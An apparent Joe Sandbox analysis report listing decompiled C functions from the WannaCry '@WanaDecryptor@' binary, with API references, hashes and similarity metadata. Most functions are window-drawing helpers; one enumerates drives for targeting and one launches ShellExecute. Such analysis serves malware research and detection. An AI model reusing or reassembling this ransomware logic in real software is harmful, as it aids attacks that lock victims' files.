				intOrPtr _t56;

				 *[fs:0x0] = _t56;
				_v40.right = 0;
				_v40.top = 0x41679c;
				_v4 = 0;
				E00409D40( &(_v40.bottom), _a4, _a8);
				OffsetRect( &_v40,  ~( *_a4),  ~(_a4[1]));
				L00412D5E();
				L00413010();
				_t34 =  *_v24;
				_t35 =  *((intOrPtr*)( *( *_a4) + 0x64))(0, 0, _t34,  *((intOrPtr*)(_t34 - 8)),  &_v68, CreateRectRgn(_v40, _v40.top, _v40.right, _v40.bottom), _t53,  *[fs:0x0], E00414220, 0xffffffff);
				L00412D52();
				_v88 = 0x415c00;
				_v56 = 1;
				L00412D52();
				 *[fs:0x0] = _v64;
				return _t35;
			}














                                                      0x00409a4e
                                                      0x00409a5d
                                                      0x00409a65
                                                      0x00409a73
                                                      0x00409a82
                                                      0x00409a9b
                                                      0x00409ac0
                                                      0x00409acc
                                                      0x00409ad7
                                                      0x00409ae4
                                                      0x00409aeb
                                                      0x00409af0
                                                      0x00409afc
                                                      0x00409b04
                                                      0x00409b0e
                                                      0x00409b18

                                                      APIs
                                                      • OffsetRect.USER32(?,?,?), ref: 00409A9B
                                                      • CreateRectRgn.GDI32(?,?,?,?), ref: 00409AB5
                                                      • #1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220), ref: 00409AC0
                                                      • #5781.MFC42(0041679C,00000000), ref: 00409ACC
                                                      • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409AEB
                                                      • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409B04
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414Rect$#1641#5781CreateOffset
                                                      • String ID:
                                                      • API String ID: 2675356817-0
                                                      • Opcode ID: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                                      • Instruction ID: 08eaaa51a6c0e03944d0349f6c05153d0be232de021c7e29130ffbf32961e4dd
                                                      • Opcode Fuzzy Hash: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                                      • Instruction Fuzzy Hash: 7621E9B5204701AFD304DF14C995FABB7E8EB88B04F108A1DF58697291CB78EC45CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004034A0 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E004034A0(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413620);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0xe8)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}















                                                      0x004034a0
                                                      0x004034a2
                                                      0x004034ad
                                                      0x004034ae
                                                      0x004034ba
                                                      0x004034c6
                                                      0x004034d6
                                                      0x004034d7
                                                      0x004034e0
                                                      0x004034e4
                                                      0x004034e7
                                                      0x004034ef
                                                      0x00403519
                                                      0x0040351f
                                                      0x00403524
                                                      0x00403529
                                                      0x00403535
                                                      0x0040353d
                                                      0x0040354b
                                                      0x00403555

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#2414#283ClientRect
                                                      • String ID:
                                                      • API String ID: 3728838672-0
                                                      • Opcode ID: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                                      • Instruction ID: 278ac0b80a8d68711b6ced8a2ef72b48c78586c4dd5442d856e74ad00dc42751
                                                      • Opcode Fuzzy Hash: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                                      • Instruction Fuzzy Hash: DB113375204741AFC314DF69D985F9BB7E8FB88714F008A1EB55AD3280DB78E8448B55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406940 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E00406940(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413E30);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0x824)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}















                                                      0x00406940
                                                      0x00406942
                                                      0x0040694d
                                                      0x0040694e
                                                      0x0040695a
                                                      0x00406966
                                                      0x00406976
                                                      0x00406977
                                                      0x00406980
                                                      0x00406984
                                                      0x00406987
                                                      0x0040698f
                                                      0x004069b9
                                                      0x004069bf
                                                      0x004069c4
                                                      0x004069c9
                                                      0x004069d5
                                                      0x004069dd
                                                      0x004069eb
                                                      0x004069f5

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#2414#283ClientRect
                                                      • String ID:
                                                      • API String ID: 3728838672-0
                                                      • Opcode ID: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                                      • Instruction ID: 6a096d29dde81ab0807628e72033e91f5df492254ff76bbe7bc423a6b66a9ecc
                                                      • Opcode Fuzzy Hash: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                                      • Instruction Fuzzy Hash: CB113375204741AFC314DF69D985F9BB7E8FB8C714F008A1EB599D3280DB78D8058BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404EB0 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E00404EB0(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413870);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0x6c)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}















                                                      0x00404eb0
                                                      0x00404eb2
                                                      0x00404ebd
                                                      0x00404ebe
                                                      0x00404eca
                                                      0x00404ed6
                                                      0x00404ee3
                                                      0x00404ee4
                                                      0x00404eed
                                                      0x00404ef1
                                                      0x00404ef4
                                                      0x00404efc
                                                      0x00404f26
                                                      0x00404f2c
                                                      0x00404f31
                                                      0x00404f36
                                                      0x00404f42
                                                      0x00404f4a
                                                      0x00404f58
                                                      0x00404f62

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#2414#283ClientRect
                                                      • String ID:
                                                      • API String ID: 3728838672-0
                                                      • Opcode ID: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                                      • Instruction ID: d163b7983d6ef18c2c490a4321b6073019a727c2a72f1ecd8d9e2d5251008e6b
                                                      • Opcode Fuzzy Hash: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                                      • Instruction Fuzzy Hash: CB113375204701AFC314DF69D985F9BB7E8FB88714F008A1EB599D3280DB78D8058B55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404310 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E00404310(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v40;
				intOrPtr _v48;
				void* _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				intOrPtr _v112;
				void* _v128;
				void* _v132;
				void* _t20;
				void* _t22;
				void* _t39;
				intOrPtr _t40;
				intOrPtr _t42;

				_push(0xffffffff);
				_push(E004137A8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t42;
				_t39 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					E004044C0(__ecx, 0);
				}
				L00412DD0();
				_t20 = _t39 + 0x48;
				_v8 = 0;
				L00412DCA();
				L00412DC4();
				L00412DBE();
				_t40 =  *((intOrPtr*)(_t39 + 0x40));
				_t22 =  *((intOrPtr*)(_v112 + 0x64))(0, 0, _t40,  *((intOrPtr*)(_t40 - 8)),  *((intOrPtr*)(_t39 + 0x64)), 1, _t20, _t39);
				_push(_t20);
				L00412DCA();
				_v40 = 0xffffffff;
				L00412DB8();
				 *[fs:0x0] = _v48;
				return _t22;
			}


















                                                      0x00404316
                                                      0x00404318
                                                      0x0040431d
                                                      0x0040431e
                                                      0x00404329
                                                      0x00404331
                                                      0x00404335
                                                      0x00404335
                                                      0x0040433f
                                                      0x00404344
                                                      0x0040434c
                                                      0x00404354
                                                      0x00404361
                                                      0x0040436e
                                                      0x00404373
                                                      0x00404387
                                                      0x0040438a
                                                      0x0040438f
                                                      0x00404398
                                                      0x004043a0
                                                      0x004043ab
                                                      0x004043b5

                                                      APIs
                                                      • #470.MFC42(?,00000000), ref: 0040433F
                                                      • #5789.MFC42 ref: 00404354
                                                      • #5875.MFC42(00000001), ref: 00404361
                                                      • #6172.MFC42(?,00000001), ref: 0040436E
                                                      • #5789.MFC42(00000000), ref: 0040438F
                                                      • #755.MFC42(00000000), ref: 004043A0
                                                        • Part of subcall function 004044C0: GetParent.USER32(?), ref: 004044D2
                                                        • Part of subcall function 004044C0: #2864.MFC42(00000000), ref: 004044D9
                                                        • Part of subcall function 004044C0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                                        • Part of subcall function 004044C0: #2860.MFC42(00000000), ref: 004044EF
                                                        • Part of subcall function 004044C0: GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                                        • Part of subcall function 004044C0: CreateFontIndirectA.GDI32(?), ref: 00404513
                                                        • Part of subcall function 004044C0: #1641.MFC42(00000000), ref: 0040451D
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#1641#2860#2864#470#5875#6172#755CreateFontIndirectMessageObjectParentSend
                                                      • String ID:
                                                      • API String ID: 3301245081-0
                                                      • Opcode ID: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
                                                      • Instruction ID: 67bcf298962d36d7fa18f20cd84a87d7b1dd540c5c31f1d51ecab4020f7c2e08
                                                      • Opcode Fuzzy Hash: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
                                                      • Instruction Fuzzy Hash: 4611CE71104300AFC310EF14D841FDAB7A4EF94724F008A1EF5A6932D0CBB8A484CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403EB0 Relevance: 9.0, APIs: 6, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 46%
                                                      			E00403EB0(void* __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr _t9;

				_t9 = _a4;
				_push(_t9);
				_push(0x407);
				L00412CE6();
				L00412D88();
				_push(_t9);
				_push(0x408);
				L00412CE6();
				L00412D88();
				_push(_t9);
				_push(2);
				L00412CE6();
				L00412D88();
				return __eax;
			}




                                                      0x00403eb2
                                                      0x00403eb8
                                                      0x00403eb9
                                                      0x00403ebe
                                                      0x00403ec5
                                                      0x00403eca
                                                      0x00403ecb
                                                      0x00403ed2
                                                      0x00403ed9
                                                      0x00403ede
                                                      0x00403edf
                                                      0x00403ee3
                                                      0x00403eea
                                                      0x00403ef1

                                                      APIs
                                                      • #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                                      • #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                                      • #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                                      • #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                                      • #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                                      • #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2642#3092
                                                      • String ID:
                                                      • API String ID: 2547810013-0
                                                      • Opcode ID: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                                      • Instruction ID: 4bb7b71439f2442b6829c2e1ec9f7e71f44d4abaae38a5a684cddd693ffb540b
                                                      • Opcode Fuzzy Hash: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                                      • Instruction Fuzzy Hash: 46D0ECB179425427D9543273AE1BD9F4959AFE1B15B10052FB301EB2C2ECFC58A282AD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403A20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00403A20(intOrPtr _a4, intOrPtr _a8) {
				union _ULARGE_INTEGER _v8;
				union _ULARGE_INTEGER _v16;
				intOrPtr _v20;
				union _ULARGE_INTEGER _v24;
				short _v28;
				short _v32;
				short _t23;
				short _t34;
				signed int _t47;
				unsigned int _t50;

				if( *((intOrPtr*)(_a8 + 8)) != 0) {
					return 1;
				} else {
					_t50 = GetLogicalDrives();
					_t47 = 2;
					do {
						if((_t50 >> _t47 & 0x00000001) != 0) {
							_t23 =  *L" : "; // 0x3a0020
							_t34 =  *0x420760; // 0x20
							_v32 = _t23;
							_t7 = _t47 + 0x41; // 0x43
							_v28 = _t34;
							_v32 = _t7;
							_v28 = 0x5c;
							if(GetDriveTypeW( &_v32) != 5 && GetDiskFreeSpaceExW( &_v32,  &_v8,  &_v24,  &_v16) != 0 && (_v20 > 0 || _v24.LowPart > 0)) {
								_v28 = 0;
								E004026B0(_a4,  &_v32);
							}
						}
						_t47 = _t47 + 1;
					} while (_t47 <= 0x19);
					return 1;
				}
			}













                                                      0x00403a2c
                                                      0x00403ae4
                                                      0x00403a32
                                                      0x00403a41
                                                      0x00403a43
                                                      0x00403a48
                                                      0x00403a51
                                                      0x00403a53
                                                      0x00403a58
                                                      0x00403a5e
                                                      0x00403a66
                                                      0x00403a69
                                                      0x00403a6e
                                                      0x00403a73
                                                      0x00403a7f
                                                      0x00403ab8
                                                      0x00403abf
                                                      0x00403abf
                                                      0x00403a7f
                                                      0x00403ac4
                                                      0x00403ac5
                                                      0x00403ad9
                                                      0x00403ad9

                                                      APIs
                                                      • GetLogicalDrives.KERNEL32 ref: 00403A35
                                                      • GetDriveTypeW.KERNEL32 ref: 00403A7A
                                                      • GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DiskDriveDrivesFreeLogicalSpaceType
                                                      • String ID: : $\
                                                      • API String ID: 222820107-856521285
                                                      • Opcode ID: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                                      • Instruction ID: 7a2fb974cbacd17fa61847377d7cab912bc040039a87a27a6beb81165ce83d4b
                                                      • Opcode Fuzzy Hash: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                                      • Instruction Fuzzy Hash: 2D116D31614301ABD315DF15D884AABBBE8FBC8710F04882EF88597290E775E948CB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406EF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 89%
                                                      			E00406EF0(void* __ecx, char* _a4, void** _a8) {
				char* _v4;
				char _v8;
				void* _v12;
				char* _t14;
				char _t15;
				char* _t17;
				struct HWND__* _t18;
				char _t23;

				_t14 = _a4;
				if(_t14[0xc] != 0x201) {
					L5:
					 *_a8 = 0;
					return _t14;
				}
				_t23 = _t14[0x18];
				_t15 = _t14[0x1c];
				_v8 = _t15;
				_t17 = _t15 - _t23 + 1;
				_v12 = _t23;
				_push(_t17);
				L00412CEC();
				_v4 = _t17;
				if(_t17 != 0) {
					_t18 = __ecx + 0x4c0;
					if(_t18 != 0) {
						_t18 =  *(_t18 + 0x20);
					}
					SendMessageA(_t18, 0x44b, 0,  &_v12);
					ShellExecuteA(0, "open", _v4, 0, 0, 5);
					_t14 = _v4;
					_push(_t14);
					L00412C98();
					goto L5;
				}
				return _t17;
			}











                                                      0x00406ef0
                                                      0x00406f01
                                                      0x00406f6a
                                                      0x00406f6e
                                                      0x00000000
                                                      0x00406f6e
                                                      0x00406f03
                                                      0x00406f06
                                                      0x00406f09
                                                      0x00406f0f
                                                      0x00406f10
                                                      0x00406f14
                                                      0x00406f15
                                                      0x00406f1d
                                                      0x00406f23
                                                      0x00406f25
                                                      0x00406f2d
                                                      0x00406f2f
                                                      0x00406f2f
                                                      0x00406f3f
                                                      0x00406f57
                                                      0x00406f5d
                                                      0x00406f61
                                                      0x00406f62
                                                      0x00000000
                                                      0x00406f67
                                                      0x00406f78

                                                      APIs
                                                      • #823.MFC42(?), ref: 00406F15
                                                      • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406F3F
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00406F57
                                                      • #825.MFC42(?), ref: 00406F62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #823#825ExecuteMessageSendShell
                                                      • String ID: open
                                                      • API String ID: 1093558810-2758837156
                                                      • Opcode ID: b3555fc8e5306fa9c71381116aefee59a3ba052e6f8451af1c149dcc11f64dcc
                                                      • Instruction ID: 5f9a2cd0b307edef7ddb37fa3a9b8e73568683458afc550aac563bbb23be8fd8
                                                      • Opcode Fuzzy Hash: b3555fc8e5306fa9c71381116aefee59a3ba052e6f8451af1c149dcc11f64dcc
                                                      • Instruction Fuzzy Hash: 0C0148B0A50301AFE610DF24DD4AF5B77E8AB84B14F00C42AF9499B291E6B4E814CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004030E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 67%
                                                      			E004030E0(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t30;

				_push(0xffffffff);
				_push(E004135B3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t30;
				_push(__ecx);
				_push(_a4);
				_push(0x8a);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x60)) = 0x415b28;
				_v12 = 1;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xa0)) = 0x415a58;
				 *((intOrPtr*)(__ecx + 0xe4)) = 0;
				 *((intOrPtr*)(__ecx + 0xe0)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0xf0)) = 0;
				 *((intOrPtr*)(__ecx + 0xec)) = 0x415a30;
				 *((intOrPtr*)(__ecx)) = 0x415958;
				 *((intOrPtr*)(__ecx + 0xf4)) = 0;
				 *[fs:0x0] = _v20;
				return __ecx;
			}







                                                      0x004030e0
                                                      0x004030e2
                                                      0x004030ed
                                                      0x004030ee
                                                      0x004030f5
                                                      0x004030ff
                                                      0x00403100
                                                      0x00403105
                                                      0x00403109
                                                      0x00403115
                                                      0x00403119
                                                      0x0040311e
                                                      0x0040312a
                                                      0x00403131
                                                      0x0040313a
                                                      0x00403140
                                                      0x00403146
                                                      0x00403150
                                                      0x00403156
                                                      0x00403160
                                                      0x00403166
                                                      0x00403171
                                                      0x0040317b

                                                      APIs
                                                      • #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                                      • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                                      • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #567$#324
                                                      • String ID: 0ZA$DZA
                                                      • API String ID: 784016053-3838179817
                                                      • Opcode ID: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                                      • Instruction ID: 8222d1989983ac506c5d09346421d66fb4ae1402eeff5ebed15e971907ed65db
                                                      • Opcode Fuzzy Hash: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                                      • Instruction Fuzzy Hash: 430169B1244B42CBD310CF19C580BDAFBE4FB84750F90892EE1AA9B741C3B864458B9A
                                                      Uniqueness

